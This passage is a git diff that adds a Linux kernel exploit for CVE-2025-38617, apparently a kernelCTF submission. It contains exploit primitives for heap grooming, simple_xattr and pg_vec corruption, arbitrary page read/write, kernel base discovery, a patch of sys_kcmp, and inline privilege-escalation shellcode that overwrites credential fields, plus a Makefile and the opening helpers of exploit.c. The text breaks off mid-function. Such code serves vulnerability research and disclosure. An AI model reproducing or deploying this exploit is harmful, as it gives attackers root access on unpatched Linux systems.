*pg_vec_buffer_thread_work_create( + struct victim_packet_socket *v, + bool exploit, + bool cleanup +); +void pg_vec_buffer_thread_work_destroy(struct pg_vec_buffer_thread_work *w); + +void *pg_vec_buffer_thread_fn(void *arg); +void pg_vec_buffer_thread_send_work(struct pg_vec_buffer_thread *t, struct pg_vec_buffer_thread_work *w); +void pg_vec_buffer_thread_wait_in_work(struct pg_vec_buffer_thread *t); +void pg_vec_buffer_thread_wait_work_complete(struct pg_vec_buffer_thread *t); +void pg_vec_buffer_thread_quit(struct pg_vec_buffer_thread *t); +struct pg_vec_buffer_thread *pg_vec_buffer_thread_create(void); +void pg_vec_buffer_thread_destroy(struct pg_vec_buffer_thread *t); + +struct tpacket_rcv_thread_work { + struct timespec pg_vec_lock_release_time; + struct timespec decrease_tpacket_rcv_thread_sleep_time; + struct msghdr *msg; +}; + +struct tpacket_rcv_thread_work *tpacket_rcv_thread_work_create( + struct timespec pg_vec_lock_release_time, + struct timespec decrease_tpacket_rcv_thread_sleep_time, + struct msghdr *msg +); + +void tpacket_rcv_thread_work_destroy(struct tpacket_rcv_thread_work *w); + +struct tpacket_rcv_thread { + pthread_t handle; + pthread_mutex_t mutex; + pthread_cond_t cond; + bool ready_to_work; + bool work_complete; + bool quit; + struct tpacket_rcv_thread_work *work; +}; + +void *tpacket_rcv_thread_fn(void *arg); +void tpacket_rcv_thread_send_work(struct tpacket_rcv_thread *t, struct tpacket_rcv_thread_work *w); +void tpacket_rcv_thread_wait_work_complete(struct tpacket_rcv_thread *t); +void tpacket_rcv_thread_quit(struct tpacket_rcv_thread *t); +struct tpacket_rcv_thread *tpacket_rcv_thread_create(void); +void tpacket_rcv_thread_destroy(struct tpacket_rcv_thread *t); + +struct msghdr *msghdr_create( + void *data, + size_t datalen, + const char *devname +); + +void msghdr_destroy(struct msghdr *msghdr); + +static inline struct timespec timespec_sub(struct timespec t1, struct timespec t2) +{ + struct timespec diff = {}; + diff.tv_nsec = t1.tv_nsec - t2.tv_nsec; + diff.tv_sec = t1.tv_sec - t2.tv_sec; + + if (diff.tv_sec > 0 && diff.tv_nsec < 0) { + diff.tv_nsec += NSEC_PER_SEC; + diff.tv_sec--; + } else if (diff.tv_sec < 0 && diff.tv_nsec > 0) { + diff.tv_nsec -= NSEC_PER_SEC; + diff.tv_sec++; + } + + return diff; +} + +static inline struct timespec timespec_add(struct timespec t1, struct timespec t2) +{ + struct timespec sum = {}; + sum.tv_nsec = t1.tv_nsec + t2.tv_nsec; + sum.tv_sec = t1.tv_sec + t2.tv_sec; + + if (sum.tv_nsec >= NSEC_PER_SEC) { + sum.tv_sec++; + sum.tv_nsec -= NSEC_PER_SEC; + } + + return sum; +} + +static inline u64 timespec_div(struct timespec t1, struct timespec t2) +{ + u64 ns1 = t1.tv_sec * NSEC_PER_SEC + t1.tv_nsec; + u64 ns2 = t2.tv_sec * NSEC_PER_SEC + t2.tv_nsec; + return ns1 / ns2; +} + +static inline int timespec_cmp(struct timespec t1, struct timespec t2) +{ + if (t1.tv_sec < t2.tv_sec) + return -1; + + if (t1.tv_sec > t2.tv_sec) + return 1; + + if (t1.tv_nsec < t2.tv_nsec) + return -1; + + if (t1.tv_nsec > t2.tv_nsec) + return 1; + + return 0; +} + +static struct timespec null_timespec = { .tv_sec = 0, .tv_nsec = 0 }; + +struct necessary_threads { + struct timerfd_waitlist_thread **timerfd_waitlist_threads; + struct pg_vec_lock_thread *pg_vec_lock_thread; + struct pg_vec_buffer_thread *pg_vec_buffer_thread; + struct tpacket_rcv_thread *tpacket_rcv_thread; +}; + +struct necessary_threads *necessary_threads_create(int timerfd); +void necessary_threads_destroy(struct necessary_threads *nt); + +#define PAGES_ORDER2_GROOM_SIMPLE_XATTR_FILEPATH "/tmp/tmpfs/pages_order2_groom" +#define PAGES_ORDER2_GROOM_SIMPLE_XATTR_NAME_FMT "security.pages_order2_groom_%d" +#define PAGES_ORDER2_GROOM_SIMPLE_XATTR_VALUE_FMT "pages_order2_groom_%d" +#define PAGES_ORDER2_GROOM_SIMPLE_XATTR_VALUE_BEGIN "pages_order2_groom_" +#define TOTAL_PAGES_ORDER2_SIMPLE_XATTR_SPRAY 2048 + +struct pages_order2_read_primitive { + struct victim_packet_socket_config *victim_packet_socket_config; + int drain_pages_order2_packet_socket; + int drain_pages_order3_packet_socket_1; + int drain_pages_order3_packet_socket_2; + struct simple_xattr_request *simple_xattr_requests[TOTAL_PAGES_ORDER2_SIMPLE_XATTR_SPRAY]; + struct simple_xattr_request *overflowed_simple_xattr_request; + struct simple_xattr_request *leaked_content_simple_xattr_request; + u64 overflowed_simple_xattr_kernel_address; + u64 leaked_content_simple_xattr_kernel_address; +}; + +void pages_order2_read_primitive_init(struct pages_order2_read_primitive *primitive); +void pages_order2_read_primitive_page_drain(struct pages_order2_read_primitive *primitive); +void pages_order2_read_primitive_page_drain_cleanup(struct pages_order2_read_primitive *primitive); +void pages_order2_read_primitive_setup_simple_xattr(struct pages_order2_read_primitive *primitive); +void pages_order2_read_primitive_cleanup_simple_xattr(struct pages_order2_read_primitive *primitive); +void pages_order2_read_primitive_main_work( + struct pages_order2_read_primitive *primitive, + struct necessary_threads *necessary_threads, + int timerfd, + int configure_network_interface_socket, + struct timespec timer_interrupt_amplitude, + struct timespec decrease_tpacket_rcv_thread_sleep_time +); + +bool pages_order2_read_primitive_build_primitive( + struct pages_order2_read_primitive *primitive, + struct necessary_threads *necessary_threads, + int configure_network_interface_socket, + int timerfd, + struct timespec decrease_tpacket_rcv_thread_sleep_time, + struct timespec timer_interrupt_amplitude +); + +struct pages_order2_read_primitive pages_order2_read_primitive_build( + struct necessary_threads *necessary_threads, + int configure_network_interface_socket, + int timerfd +); + +void *pages_order2_read_primitive_trigger(struct pages_order2_read_primitive *pages_order2_read_primitive); +bool pages_order2_read_primitive_build_leaked_simple_xattr(struct pages_order2_read_primitive *pages_order2_read_primitive); + +#define SIMPLE_XATTR_LEAKED_PAGES_ORDER3_ADDRESS_NAME_FMT "security.leaked_pages_order3_addr_%d" +#define SIMPLE_XATTR_LEAKED_PAGES_ORDER3_ADDRESS_VALUE_FMT "leaked_pages_order3_addr_%d" + +#define TOTAL_PAGES_ORDER2_PG_VEC_SPRAY 256 + +struct simple_xattr_read_write_primitive { + struct victim_packet_socket_config *victim_packet_socket_config; + int drain_pages_order2_packet_socket; + int drain_pages_order3_packet_socket_1; + int drain_pages_order3_packet_socket_2; + int spray_pg_vec_packet_sockets[TOTAL_PAGES_ORDER2_PG_VEC_SPRAY]; + int spray_pg_vec_packet_sockets_state[TOTAL_PAGES_ORDER2_PG_VEC_SPRAY]; + int overflowed_pg_vec_packet_socket; + struct simple_xattr_request *manipulated_simple_xattr_request; + void *mmap_address; +}; + +void simple_xattr_read_write_primitive_init(struct simple_xattr_read_write_primitive *primitive); +void simple_xattr_read_write_primitive_page_drain(struct simple_xattr_read_write_primitive *primitive); +void simple_xattr_read_write_primitive_setup_pg_vec(struct simple_xattr_read_write_primitive *primitive); +void simple_xattr_read_write_primitive_page_drain_cleanup(struct simple_xattr_read_write_primitive *primitive); +void simple_xattr_read_write_primitive_pg_vec_cleanup(struct simple_xattr_read_write_primitive *primitive); +void simple_xattr_read_write_primitive_main_work( + struct simple_xattr_read_write_primitive *primitive, + struct necessary_threads *necessary_threads, + int timerfd, + int configure_network_interface_socket, + struct timespec timer_interrupt_amplitude, + struct timespec decrease_tpacket_rcv_thread_sleep_time, + u64 simple_xattr_kernel_address +); + +bool simple_xattr_read_write_primitive_build_primitive( + struct simple_xattr_read_write_primitive *simple_xattr_read_write_primitive, + struct pages_order2_read_primitive *pages_order2_read_primitive, + struct necessary_threads *necessary_threads, + int timerfd, + int configure_network_interface_socket, + struct timespec decrease_tpacket_rcv_thread_sleep_time, + struct timespec timer_interrupt_amplitude +); + +struct simple_xattr_read_write_primitive simple_xattr_read_write_primitive_build( + struct necessary_threads *necessary_threads, + int configure_network_interface_socket, + int timerfd, + struct pages_order2_read_primitive *pages_order2_read_primitive +); + +struct simple_xattr *simple_xattr_read_write_primitive_mmap(struct simple_xattr_read_write_primitive *simple_xattr_read_write_primitive); +void simple_xattr_read_write_primitive_munmap(struct simple_xattr_read_write_primitive *simple_xattr_read_write_primitive); + +#define LEAK_PAGES_ORDER2_FOR_FAKE_SIMPLE_XATTR_NAME__SIMPLE_XATTR_NAME "security.leak_pages_order2_for_fake_simple_xattr_name" +#define LEAK_PAGES_ORDER2_FOR_FAKE_SIMPLE_XATTR__SIMPLE_XATTR_NAME "security.leak_pages_order2_for_fake_simple_xattr" + +#define FAKE_SIMPLE_XATTR_NAME "security.fake_simple_xattr_name" +#define DETECT_FAKE_SIMPLE_XATTR_RECLAIMATION "security.detect_fake_simple_xattr_reclaimation" + +struct abr_page_read_write_primitive { + int packet_socket_with_overwritten_pg_vec; + int packet_socket_to_overwrite_pg_vec; + u64 overwrite_pg_vec_mmap_size; + u64 overwritten_pg_vec_mmap_size; + u64 original_buffer_page_addr; +}; + +void abr_page_read_write_primitive_build_primitive( + struct abr_page_read_write_primitive *abr_page_read_write_primitive, + struct simple_xattr_read_write_primitive *simple_xattr_read_write_primitive, + struct pages_order2_read_primitive *pages_order2_read_write_primitive +); + +void *abr_page_read_write_primitive_mmap( + struct abr_page_read_write_primitive *abr_page_read_write_primitive, + u64 page_aligned_addr_to_mmap +); + +void abr_page_read_write_primitive_munmap( + struct abr_page_read_write_primitive *abr_page_read_write_primitive, + void *mem +); + +#define LEAKED_PAGES_ORDER2_ADDRESS_FOR_PIPE_BUFFER_SIMPLE_XATTR_NAME "security.leaked_pages_order2_addr_for_pipe_buffer" + +u64 find_kernel_base( + struct abr_page_read_write_primitive *abr_page_read_write_primitive, + struct simple_xattr_read_write_primitive *simple_xattr_read_write_primitive +); + +void *patch_sys_kcmp(struct abr_page_read_write_primitive *abr_page_read_write_primitive); + +extern void privilege_escalation_shellcode_begin(void); +extern void privilege_escalation_shellcode_end(void); + +__asm__( + ".intel_syntax noprefix;" + ".global privilege_escalation_shellcode_begin;" + ".global privilege_escalation_shellcode_end;" + + "privilege_escalation_shellcode_begin:\n" + + "mov rax,QWORD PTR gs:0x20c80;" + "shl rdi, 32;" + "shl rsi, 32;" + "shr rsi, 32;" + "or rdi, rsi;" + "mov QWORD PTR [rax + 0x7d0], rdi;" + "mov QWORD PTR [rax + 0x7d8], rdi;" + "mov QWORD PTR [rax + 0x828], rcx;" + "jmp r8;" + + "privilege_escalation_shellcode_end:\n" + ".att_syntax;" +); + +#endif \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/exploit/mitigation-v4-6.6/Makefile b/pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/exploit/mitigation-v4-6.6/Makefile new file mode 100644 index 000000000..e9e975869 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/exploit/mitigation-v4-6.6/Makefile @@ -0,0 +1,32 @@ +# taken from: https://github.com/google/security-research/blob/1bb2f8c8d95a34cafe7861bc890cfba5d85ec141/pocs/linux/kernelctf/CVE-2024-0193_lts/exploit/lts-6.1.67/Makefile + +LIBMNL_DIR = $(realpath ./)/libmnl_build +LIBNFTNL_DIR = $(realpath ./)/libnftnl_build + +LIBS = -L$(LIBMNL_DIR)/install/lib -lmnl +INCLUDES = -I$(LIBMNL_DIR)/libmnl-1.0.5/include +CFLAGS = -static -Ofast + +exploit: exploit.c + gcc -o exploit exploit.c $(LIBS) $(INCLUDES) $(CFLAGS) + + +prerequisites: libmnl-build + +libmnl-build : libmnl-download + tar -C $(LIBMNL_DIR) -xvf $(LIBMNL_DIR)/libmnl-1.0.5.tar.bz2 + cd $(LIBMNL_DIR)/libmnl-1.0.5 && ./configure --enable-static --prefix=`realpath ../install` + cd $(LIBMNL_DIR)/libmnl-1.0.5 && make -j`nproc` + cd $(LIBMNL_DIR)/libmnl-1.0.5 && make install + + +libmnl-download : + mkdir $(LIBMNL_DIR) + wget -P $(LIBMNL_DIR) https://netfilter.org/projects/libmnl/files/libmnl-1.0.5.tar.bz2 + +run: + ./exploit + +clean: + rm -f exploit + rm -rf $(LIBMNL_DIR) diff --git a/pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/exploit/mitigation-v4-6.6/exploit b/pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/exploit/mitigation-v4-6.6/exploit new file mode 100644 index 000000000..c243400ba Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/exploit/mitigation-v4-6.6/exploit differ diff --git a/pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/exploit/mitigation-v4-6.6/exploit.c b/pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/exploit/mitigation-v4-6.6/exploit.c new file mode 100644 index 000000000..a1b5a8589 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/exploit/mitigation-v4-6.6/exploit.c @@ -0,0 +1,2158 @@ +#include "exploit.h" + +void unix_error(const char *msg) +{ + fprintf(stderr, "%s: %s\n", msg, strerror(errno)); + exit(EXIT_FAILURE); +} + +void Mnl_socket_error(const char *msg) +{ + fprintf(stderr, "%s: %s\n", msg, strerror(errno)); + exit(EXIT_FAILURE); +} + +void Pthread_error(const char *msg, int error_code) +{ + fprintf(stderr, "%s: %s\n", msg, strerror(error_code)); + exit(EXIT_FAILURE); +} + +void Unshare(int flags) +{ + if (unshare(flags) < 0) + unix_error("unshare"); +} + +int Socket(int domain, int type, int protocol) +{ + int fd = socket(domain, type, protocol); + if (fd < 0) + unix_error("socket"); + return fd; +} + +void Setsockopt(int fd, int level, int optname, const void *optval, socklen_t optlen) +{ + if (setsockopt(fd, level, optname, optval, optlen) < 0) + unix_error("setsockopt"); +} + +void Getsockopt(int fd, int level, int optname, void *optval, socklen_t *optlen) +{ + if (getsockopt(fd, level, optname, optval, optlen) < 0) + unix_error("getsockopt"); +} + +void Bind(int fd, const struct sockaddr *addr, socklen_t addrlen) +{ + if (bind(fd, addr, addrlen) < 0) + unix_error("bind"); +} + +void Ioctl(int fd, unsigned long request, unsigned long arg) +{ + if (ioctl(fd, request, arg) < 0) + unix_error("ioctl"); +} + +void Close(int fd) +{ + if (close(fd) < 0) + unix_error("close"); +} + +int Dup(int fd) +{ + int newfd = dup(fd); + if (newfd < 0) + unix_error("dup"); + return newfd; +} + +void Pipe2(int pipefd[2], int flags) +{ + if (pipe2(pipefd, flags) < 0) + unix_error("pipe2"); +} + +int Fcntl(int fd, int op, unsigned long arg) +{ + int ret = fcntl(fd, op, arg); + if (ret < 0) + unix_error("fcntl"); + return ret; +} + +void *Mmap(void *addr, size_t len, int prot, int flags, int fd, off_t offset) +{ + void *m = mmap(addr, len, prot, flags, fd, offset); + if (m == MAP_FAILED) + unix_error("mmap"); + return m; +} + +void Munmap(void *addr, size_t len) +{ + if (munmap(addr, len) < 0) + unix_error("munmap"); +} + +FILE *Fopen(const char *filename, const char *modes) +{ + FILE *f = fopen(filename, modes); + if (f == NULL) + unix_error("fopen"); + return f; +} + +void Fclose(FILE *stream) +{ + if (fclose(stream) != 0) + unix_error("fclose"); +} + +void *Calloc(size_t nmemb, size_t size) +{ + void *p = calloc(nmemb, size); + if (p == NULL) + unix_error("calloc"); + return p; +} + +ssize_t Sendmsg(int socket, const struct msghdr *message, int flags) +{ + ssize_t ret = sendmsg(socket, message, flags); + if (ret < 0) + unix_error("sendmsg"); + return ret; +} + +void Pthread_create(pthread_t *newthread, const pthread_attr_t *attr, void *(*start_routine) (void *), void *arg) +{ + int ret = pthread_create(newthread, attr, start_routine, arg); + if (ret != 0) + Pthread_error("pthread_create", ret); +} + +void Pthread_join(pthread_t thread, void **retval) +{ + int ret = pthread_join(thread, retval); + if (ret != 0) + Pthread_error("pthread_join", ret); +} + +void Pthread_setaffinity_np(pthread_t thread, size_t cpusetsize, const cpu_set_t *cpuset) +{ + int ret = pthread_setaffinity_np(thread, cpusetsize, cpuset); + if (ret != 0) + Pthread_error("pthread_setaffinity_np", ret); +} + +void Getrlimit(int resource, struct rlimit *rlim) +{ + if (getrlimit(resource, rlim) < 0) + unix_error("getrlimit"); +} + +void Setrlimit(int resource, const struct rlimit *rlim) +{ + if (setrlimit(resource, rlim) < 0) + unix_error("setrlimit"); +} + +void Setpriority(int which, id_t who, int value) +{ + if (setpriority(which, who, value) < 0) + unix_error("setpriority"); +} + +int Timerfd_create(int clockid, int flags) +{ + int timerfd = timerfd_create(clockid, flags); + if (timerfd < 0) + unix_error("timerfd_create"); + return timerfd; +} + +void Timerfd_settime(int fd, int flags, const struct itimerspec *new_value, struct itimerspec *old_value) +{ + if (timerfd_settime(fd, flags, new_value, old_value) < 0) + unix_error("timerfd_settime"); +} + +int Epoll_create1(int flags) +{ + int epfd = epoll_create1(flags); + if (epfd < 0) + unix_error("epoll_create1"); + return epfd; +} + +void Epoll_ctl(int epfd, int op, int fd, struct epoll_event *event) +{ + if (epoll_ctl(epfd, op, fd, event) < 0) + unix_error("epoll_ctl"); +} + +unsigned int If_nametoindex(const char *ifname) +{ + unsigned int ifindex = if_nametoindex(ifname); + if (ifindex == 0) + unix_error("if_nametoindex"); + return ifindex; +} + +void Mkdir(const char *pathname, mode_t mode) +{ + if (mkdir(pathname, mode) < 0) + unix_error("mkdir"); +} + +void Mount(const char *source, const char *target, const char *filesystemtype, unsigned long mountflags, const void *data) +{ + if (mount(source, target, filesystemtype, mountflags, data) < 0) + unix_error("mount"); +} + +int Open(const char *pathname, int flags, mode_t mode) +{ + int fd = open(pathname, flags, mode); + if (fd < 0) + unix_error("open"); + return fd; +} + +void Setxattr(const char *path, const char *name, const void *value, size_t size, int flags) +{ + if (setxattr(path, name, value, size, flags) < 0) + unix_error("setxattr"); +} + +ssize_t Getxattr(const char *path, const char *name, void *value, size_t size) +{ + ssize_t ret = getxattr(path, name, value, size); + if (ret < 0) + unix_error("getxattr"); + return ret; +} + +void Removexattr(const char *path, const char *name) +{ + if (removexattr(path, name) < 0) + unix_error("removexattr"); +} + +char *Strdup(const char *s) +{ + char *s1 = strdup(s); + if (s1 == NULL) + unix_error("strdup"); + return s1; +} + +ssize_t Read(int fd, void *buf, size_t count) +{ + ssize_t ret = read(fd, buf, count); + if (ret < 0) + unix_error("read"); + return ret; +} + +ssize_t Write(int fd, const void *buf, size_t count) +{ + ssize_t ret = write(fd, buf, count); + if (ret < 0) + unix_error("write"); + return ret; +} + +struct mnl_socket *Mnl_socket_open(int bus) +{ + struct mnl_socket *nl = mnl_socket_open(bus); + if (nl == NULL) + Mnl_socket_error("mnl_socket_open"); + return nl; +} + +void Mnl_socket_close(struct mnl_socket *nl) +{ + if (mnl_socket_close(nl) < 0) + Mnl_socket_error("mnl_socket_close"); +} + +void Mnl_socket_bind(struct mnl_socket *nl, unsigned int groups, pid_t pid) +{ + if (mnl_socket_bind(nl, groups, pid) < 0) + Mnl_socket_error("mnl_socket_bind"); +} + +ssize_t Mnl_socket_sendto(const struct mnl_socket *nl, const void *req, size_t size) +{ + ssize_t rc = mnl_socket_sendto(nl, req, size); + if (rc < 0) + Mnl_socket_error("mnl_socket_sendto"); + return rc; +} + +ssize_t Mnl_socket_recvfrom(const struct mnl_socket *nl, void *buf, size_t size) +{ + ssize_t rc = mnl_socket_recvfrom(nl, buf, size); + if (rc < 0) + Mnl_socket_error("mnl_socket_recvfrom"); + return rc; +} + +void validate_mnl_socket_operation_success(struct mnl_socket *nl, u32 seq) +{ + u8 buf[8192] = {}; + u32 portid = mnl_socket_get_portid(nl); + ssize_t ret = mnl_socket_recvfrom(nl, buf, sizeof(buf)); + + while (ret > 0) { + ret = mnl_cb_run(buf, ret, seq, portid, NULL, NULL); + if (ret <= 0) + break; + ret = mnl_socket_recvfrom(nl, buf, sizeof(buf)); + } + + if (ret < 0) + exit(EXIT_FAILURE); +} + +void dummy_network_interface_create(const char *ifname, u32 mtu) +{ + struct mnl_socket *nl = Mnl_socket_open(NETLINK_ROUTE); + Mnl_socket_bind(nl, 0, MNL_SOCKET_AUTOPID); + u32 seq = time(NULL); + u8 buf[8192] = {}; + + struct nlmsghdr *nlh = mnl_nlmsg_put_header(buf); + nlh->nlmsg_type = RTM_NEWLINK; + nlh->nlmsg_seq = seq; + nlh->nlmsg_flags = NLM_F_ACK | NLM_F_REQUEST | NLM_F_CREATE; + + struct ifinfomsg *ifm = mnl_nlmsg_put_extra_header(nlh, sizeof(*ifm)); + mnl_attr_put_strz(nlh, IFLA_IFNAME, ifname); + mnl_attr_put_u32(nlh, IFLA_MTU, mtu); + + struct nlattr *linkinfo = mnl_attr_nest_start(nlh, IFLA_LINKINFO); + mnl_attr_put_strz(nlh, IFLA_INFO_KIND, "dummy"); + mnl_attr_nest_end(nlh, linkinfo); + + Mnl_socket_sendto(nl, nlh, nlh->nlmsg_len); + validate_mnl_socket_operation_success(nl, seq); + Mnl_socket_close(nl); +} + +void network_interface_up(int configure_socket_fd, const char *ifname) +{ + struct ifreq ifr = {}; + strncpy(ifr.ifr_name, ifname, IFNAMSIZ); + Ioctl(configure_socket_fd, SIOCGIFFLAGS, (unsigned long)&ifr); + + strncpy(ifr.ifr_name, ifname, IFNAMSIZ); + ifr.ifr_flags |= (IFF_UP | IFF_RUNNING); + Ioctl(configure_socket_fd, SIOCSIFFLAGS, (unsigned long)&ifr); +} + +void network_interface_down(int configure_socket_fd, const char *ifname) +{ + struct ifreq ifr = {}; + strncpy(ifr.ifr_name, ifname, IFNAMSIZ); + Ioctl(configure_socket_fd, SIOCGIFFLAGS, (unsigned long)&ifr); + + strncpy(ifr.ifr_name, ifname, IFNAMSIZ); + ifr.ifr_flags &= (~IFF_UP); + Ioctl(configure_socket_fd, SIOCSIFFLAGS, (unsigned long)&ifr); +} + +void pin_thread_on_cpu(int cpu) +{ + cpu_set_t cpuset; + CPU_ZERO(&cpuset); + CPU_SET(cpu, &cpuset); + + pthread_t current_thread = pthread_self(); + Pthread_setaffinity_np(current_thread, sizeof(cpu_set_t), &cpuset); +} + +void setup_namespace(void) +{ + int uid = getuid(); + int gid = getgid(); + + Unshare(CLONE_NEWUSER | CLONE_NEWNET | CLONE_NEWNS); + + FILE *f = NULL; + f = Fopen("/proc/self/uid_map", "w"); + fprintf(f, "0 %d 1\n", uid); + Fclose(f); + + f = Fopen("/proc/self/setgroups", "w"); + fprintf(f, "deny\n"); + Fclose(f); + + f = Fopen("/proc/self/gid_map", "w"); + fprintf(f, "0 %d 1\n", gid); + Fclose(f); +} + +void setup_tmpfs(void) +{ + Mkdir(TMPFS_MOUNT_POINT, 0644); + Mount("none", TMPFS_MOUNT_POINT, "tmpfs", 0, NULL); + create_file(PAGES_ORDER2_GROOM_SIMPLE_XATTR_FILEPATH); +} + +void setup_nofile_rlimit(void) +{ + struct rlimit nofile_rlimit = {}; + Getrlimit(RLIMIT_NOFILE, &nofile_rlimit); + nofile_rlimit.rlim_cur = nofile_rlimit.rlim_max; + Setrlimit(RLIMIT_NOFILE, &nofile_rlimit); +} + +void create_file(const char *path) +{ + int fd = Open(path, O_WRONLY | O_CREAT, 0644); + Close(fd); +} + +bool thread_in_sleep_state(int tid) +{ + if (tid == -1) + return false; + + char proc_path[4096] = {}; + char line_buffer[4096] = {}; + + snprintf(proc_path, sizeof(proc_path), "/proc/%d/stat", tid); + FILE *f = Fopen(proc_path, "r"); + + if (!fgets(line_buffer, sizeof(line_buffer), f)) { + Fclose(f); + return false; + } + + char *p = line_buffer; + int space_count = 0; + while (*p != '\0' && space_count != 2) { + if (*p == ' ') { + space_count++; + } + + p++; + } + + Fclose(f); + + if (*p == 'S' || *p == 'D') { + return true; + } + + return false; +} + +void alloc_pages(int packet_socket, unsigned page_count, unsigned page_size) +{ + struct tpacket_req tx_ring_req = {}; + tx_ring_req.tp_block_nr = page_count; + tx_ring_req.tp_block_size = page_size; + tx_ring_req.tp_frame_size = page_size; + tx_ring_req.tp_frame_nr = tx_ring_req.tp_block_size / tx_ring_req.tp_frame_size * tx_ring_req.tp_block_nr; + Setsockopt(packet_socket, SOL_PACKET, PACKET_TX_RING, &tx_ring_req, sizeof(tx_ring_req)); +} + +void free_pages(int packet_socket) +{ + struct tpacket_req tx_ring_req = {}; + Setsockopt(packet_socket, SOL_PACKET, PACKET_TX_RING, &tx_ring_req, sizeof(tx_ring_req)); +} + +struct victim_packet_socket_config *victim_packet_socket_config_create( + struct __kernel_sock_timeval sndtimeo, + struct sockaddr_ll addr, + struct tpacket_req3 tx_ring, + struct tpacket_req3 rx_ring, + int packet_loss, + int packet_version, + unsigned packet_reserve, + struct sock_filter filter[MAX_FILTER_LEN] +) +{ + struct victim_packet_socket_config *config = Calloc(1, sizeof(*config)); + config->sndtimeo = sndtimeo; + config->addr = addr; + config->tx_ring = tx_ring; + config->rx_ring = rx_ring; + config->packet_loss = packet_loss; + config->packet_version = packet_version; + config->packet_reserve = packet_reserve; + memcpy(config->filter, filter, MAX_FILTER_LEN * sizeof(struct sock_filter)); + return config; +} + +void victim_packet_socket_config_destroy(struct victim_packet_socket_config *config) +{ + free(config); +} + +struct victim_packet_socket *victim_packet_socket_create(struct victim_packet_socket_config *config) +{ + struct victim_packet_socket *v = Calloc(1, sizeof(*v)); + v->config = Calloc(1, sizeof(*v->config)); + memcpy(v->config, config, sizeof(struct victim_packet_socket_config)); + v->fd = Socket(AF_PACKET, SOCK_RAW, 0); + return v; +} + +void victim_packet_socket_destroy(struct victim_packet_socket *v) +{ + victim_packet_socket_config_destroy(v->config); + Close(v->fd); + free(v); +} + +void victim_packet_socket_configure(struct victim_packet_socket *v) +{ + struct victim_packet_socket_config *config = v->config; + Bind(v->fd, (const struct sockaddr *)&config->addr, sizeof(config->addr)); + Setsockopt(v->fd, SOL_SOCKET, SO_SNDTIMEO_NEW, &config->sndtimeo, sizeof(config->sndtimeo)); + Setsockopt(v->fd, SOL_PACKET, PACKET_LOSS, &config->packet_loss, sizeof(config->packet_loss)); + Setsockopt(v->fd, SOL_PACKET, PACKET_VERSION, &config->packet_version, sizeof(config->packet_version)); + Setsockopt(v->fd, SOL_PACKET, PACKET_RESERVE, &config->packet_reserve, sizeof(config->packet_reserve)); + Setsockopt(v->fd, SOL_PACKET, PACKET_RX_RING, &config->rx_ring, sizeof(config->rx_ring)); + Setsockopt(v->fd, SOL_PACKET, PACKET_TX_RING, &config->tx_ring, sizeof(config->tx_ring)); + struct sock_fprog fprog = { .filter = config->filter, .len = MAX_FILTER_LEN }; + Setsockopt(v->fd, SOL_SOCKET, SO_ATTACH_FILTER, &fprog, sizeof(fprog)); + + u64 tx_ring_size = (u64)config->tx_ring.tp_block_size * config->tx_ring.tp_block_nr; + u64 rx_ring_size = (u64)config->rx_ring.tp_block_size * config->rx_ring.tp_block_nr; + u64 ring_size = tx_ring_size + rx_ring_size; + void *ring = Mmap(NULL, ring_size, PROT_READ | PROT_WRITE, MAP_SHARED, v->fd, 0); + void *tx_ring = ring + rx_ring_size; + struct tpacket3_hdr *h = tx_ring; + h->tp_len = 1; + h->tp_status = TP_STATUS_SEND_REQUEST; + Munmap(ring, ring_size); +} + +struct simple_xattr_request *simple_xattr_request_create( + const char *filepath, + const char *name, + const char *value, + size_t value_size +) +{ + struct simple_xattr_request *request = Calloc(1, sizeof(*request)); + strncpy(request->filepath, filepath, PATH_MAX); + strncpy(request->name, name, XATTR_NAME_MAX); + request->value = Calloc(1, value_size); + memcpy(request->value, value, value_size); + request->value_size = value_size; + request->allocated = false; + return request; +} + +void simple_xattr_request_destroy(struct simple_xattr_request *request) +{ + free(request->value); + free(request); +} + +void *timerfd_waitlist_thread_fn(void *arg) +{ + pin_thread_on_cpu(CPU_NUMBER_ONE); + struct timerfd_waitlist_thread *t = arg; + t->tid = gettid(); + + Unshare(CLONE_FILES); + pthread_mutex_lock(&t->mutex); + t->unshare_complete = true; + pthread_cond_signal(&t->cond); + pthread_mutex_unlock(&t->mutex); + + Close(STDIN_FILENO); + Close(STDOUT_FILENO); + Close(STDERR_FILENO); + + int epollfd = Epoll_create1(0); + + struct rlimit nofile_rlimit = {}; + Getrlimit(RLIMIT_NOFILE, &nofile_rlimit); + t->timerfds = Calloc(nofile_rlimit.rlim_cur, sizeof(*t->timerfds)); + t->timerfds[0] = t->timerfd; + t->total_timerfd = 1; + + for (int i = 1; i < (int)nofile_rlimit.rlim_cur; i++) { + t->timerfds[i] = dup(t->timerfds[0]); + if (t->timerfds[i] < 0) + break; + + t->total_timerfd++; + } + + t->epoll_events = Calloc(t->total_timerfd, sizeof(*t->epoll_events)); + for (int i = 0; i < t->total_timerfd; i++) { + t->epoll_events[i].data.fd = t->timerfds[i]; + t->epoll_events[i].events = EPOLLIN; + Epoll_ctl(epollfd, EPOLL_CTL_ADD, t->timerfds[i], &t->epoll_events[i]); + } + + for ( ;; ) { + pthread_mutex_lock(&t->mutex); + while (!t->quit && !t->ready_to_work) + pthread_cond_wait(&t->cond, &t->mutex); + + t->ready_to_work = false; + bool quit = t->quit; + pthread_mutex_unlock(&t->mutex); + + if (quit) + break; + + pthread_mutex_lock(&t->mutex); + t->work_complete = true; + pthread_cond_signal(&t->cond); + pthread_mutex_unlock(&t->mutex); + } + + for (int i = 1; i < t->total_timerfd; i++) + Close(t->timerfds[i]); + + Close(epollfd); + free(t->epoll_events); + free(t->timerfds); + + return NULL; +} + +void timerfd_waitlist_thread_wait_unshare_complete(struct timerfd_waitlist_thread *t) +{ + pthread_mutex_lock(&t->mutex); + while (!t->unshare_complete) + pthread_cond_wait(&t->cond, &t->mutex); + pthread_mutex_unlock(&t->mutex); +} + +void timerfd_waitlist_thread_send_work(struct timerfd_waitlist_thread *t) +{ + pthread_mutex_lock(&t->mutex); + t->ready_to_work = true; + 